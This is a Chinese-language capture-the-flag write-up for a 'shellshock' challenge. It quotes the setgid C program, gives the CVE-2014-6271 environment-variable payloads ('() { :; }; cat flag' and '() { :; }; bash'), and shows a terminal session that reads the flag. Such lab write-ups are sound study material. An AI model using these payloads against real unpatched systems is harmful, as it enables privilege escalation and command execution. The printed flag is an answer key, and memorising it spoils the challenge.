题目描述：

Mommy, there was a shocking news about bash.

I bet you already know, but lets just make it sure 🙂

ssh [email protected] -p2222 (pw:guest)

shellshock.c的源码为：

#include <stdio.h>
int main(){
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

顾名思义了，这题就是需要利用shellshock漏洞来获取flag，具体的讲解参见：http://www.myhack58.com/Article/html/3/62/2015/60779.htm

所以我们构造payload：export foo=’() { :; }; cat flag‘直接获取flag，或者export foo=’() { :; }; bash’切换成shellshock2用户的bash，然后再执行命令获取flag：

shellshock@ubuntu:/home/shellshock$ export foo=’() { :; }; bash’

shellshock@ubuntu:/home/shellshock$ ./shellshock

shellshock@ubuntu:/home/shellshock$

shellshock@ubuntu:/home/shellshock$

shellshock@ubuntu:/home/shellshock$ cat flag

only if I knew CVE-2014-6271 ten years ago..!!

shellshock@ubuntu:/home/shellshock$ cat flag

only if I knew CVE-2014-6271 ten years ago..!!

shellshock@ubuntu:/home/shellshock$ whoami

shellshock

shellshock@ubuntu:/home/shellshock$ cat flag

only if I knew CVE-2014-6271 ten years ago..!!

shellshock@ubuntu:/home/shellshock$ id

uid=1048(shellshock) gid=1049(shellshock2) groups=1048(shellshock)

最后的flag为：only if I knew CVE-2014-6271 ten years ago..!!